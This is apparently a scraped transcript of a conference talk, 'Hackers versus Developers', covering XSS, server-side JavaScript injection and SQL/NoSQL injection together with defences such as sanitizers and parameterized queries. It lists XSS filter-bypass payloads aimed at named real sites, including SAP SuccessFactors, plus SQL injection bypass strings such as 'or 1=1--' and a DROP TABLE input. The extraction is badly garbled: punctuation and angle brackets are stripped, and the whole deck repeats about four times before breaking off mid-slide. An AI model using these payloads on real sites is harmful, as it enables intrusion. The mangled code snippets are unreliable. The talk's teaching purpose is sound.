hackers vs developers
TRANSCRIPT
Soumyasanto Sen sitWDF
Hackers versus DevelopersThe GAME is ON
Introduction
Player 1
Hackers
Expert Skillful with detailed understanding of some area deeply often scarily deeply
Unsocial Donrsquot want to come out of the shell
Breaker Hack Apps
Cool People think that they are cool and they
think they are Awesome
Super Power They believe that they can be
Masters of the Universe
sitWDF
Controller Can use lot of Systems and
Languages and get them talk to each other
Social True and broad professionals work with people and communicate well
Builder Create Apps
Boring There are other more important things in life than just coding
Super Power They believe they can change
this World
Player 2
Developers
VS
sitWDF
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Introduction
Player 1
Hackers
Expert Skillful with detailed understanding of some area deeply often scarily deeply
Unsocial Donrsquot want to come out of the shell
Breaker Hack Apps
Cool People think that they are cool and they
think they are Awesome
Super Power They believe that they can be
Masters of the Universe
sitWDF
Controller Can use lot of Systems and
Languages and get them talk to each other
Social True and broad professionals work with people and communicate well
Builder Create Apps
Boring There are other more important things in life than just coding
Super Power They believe they can change
this World
Player 2
Developers
VS
sitWDF
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
decodeURI decodes encoded URI
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=xxxxxxxxyyyyyltimg
Possibilities
bull -confirm(1)-
bull -confirm`1`-
httpthomenewscnspIndexactionds=allamph=458amppageSize=20amptemp=topicRollamptopic=-confirm(1)-lsquo
var topic = decodeURI()confirm(1)()
var topic = decodeURI()confirm(1))
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
JavaScripts Built-In Function(s)
replace (JS String replace Method) returns a string after a pattern
httpwwwzaobaocomsgsearchsitexxxxxxxxyyyyyltimg
Possibilities
httpwwwzaobaocomsgsearchsite-confirm(1)-
httpwwwzaobaocomsgsearchsite)confirm(1)(
httpwwwzaobaocomsgsearchsite)confirm(1) (does not work because is filtered)
Hacking looks lsquoSimplersquo
sitWDF
XSS - Cross Site Scripting
Easy Rules
sitWDF
Preventions
bull XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
bull HTML5 Security Clean Sheet
bull Secure Coding Practice Guidelines
bull Use Clean URLs httpswwwsitecomnewsphpid=1337 is way more tempting than
httpswwwsitecomnewssome-news-or-today
bull Sanitize Inputs Must for XSS
bull Controlling Access Control httpwwwsitecomphpmyadmin gave us access to complete database No injection nothing
bull Validation on Input
bull Use White-Listing
bull Switch-Off Errors
Easy Rules
sitWDF
Remember
ldquoSuccessful hackers are not just good at hacking What makes a great hacker successful is that they are excellent at understanding human naturerdquo
( Developers love their code just like its their child )
ldquoDo not trust anything ever specially when it comes to user inputrdquo
ldquoSecurity is about layers It has to be because no single layer can be guaranteed to actually be securerdquo
Security is nothing but an ILLUSION
sitWDFsitWDF
sitWDF
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
-confirm(1)- was enough to break SAPs SuccessFactorss XSS filter and were able to make hundreds of web applications vulnerable
httpsjobssapcomtalentcommunityloginreturnurl=xxxxxxxxyyyyyltimg
Possibilities
bull ltscriptgtltscriptgtalert(1)ltscriptgt
bull -confirm(1)-
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
httpsjobssapcomtalentcommunityloginreturnurl=ltscriptgtltscriptgtalert(1)ltscriptgt
Next Vector ltimg src=x onerror=alert(1)gt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vector ltimg src=x onerror=confirm(1)gt
Next Vector lta href=javascriptconfirm(1)gtclickltagt
Hacking looks lsquoSimplersquo
Even for
sitWDF
Breaking SuccessFactorss XSS Filter
Next Vectors
bull ltp onmouseover=prompt(1)gtIamParagraphltpgt
bull ltdetails ontoggle=confirm(1)gt
bull ltinput type=search onsearch=confirm(1)gt
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
